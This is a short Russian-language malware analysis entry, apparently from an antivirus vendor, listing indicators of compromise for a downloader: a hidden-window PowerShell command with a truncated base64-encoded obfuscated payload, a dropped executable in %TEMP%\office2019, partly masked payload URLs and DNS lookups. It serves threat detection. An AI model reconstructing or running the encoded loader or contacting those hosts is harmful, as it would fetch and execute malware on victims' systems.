Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAeAB3AHYANAA3AD0AKAAnAFUAYgBmAGIANAAnACsAJwAzACcAKwAnADEAJwApADsALgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAGUAbQBQAFwATwBmAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\cf7ygw.exe
- %TEMP%\office2019\cf7ygw.exe
- http://co#####.dianevenzera.com/cgi-bin/u9lh_i_ivgw/
- http://ka##ii.com/dyy/0y_tej_x2wufq52a/
- http://pi######ghteambuilding.com/wp-includes/w_ne_nwof/
- http://www.if###oves.net/3sr5_yxja_bd6v1qt/
- DNS ASK fu###uggage.com
- DNS ASK co#####.dianevenzera.com
- DNS ASK ka##ii.com
- DNS ASK pi######ghteambuilding.com
- DNS ASK gv##tz.com
- DNS ASK if###oves.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAeAB3AHYANAA3AD0AKAAnAFUAYgBmAGIANAAnACsAJwAzACcAKwAnADEAJwApADsALgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAGUAbQBQAFwATwBmAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)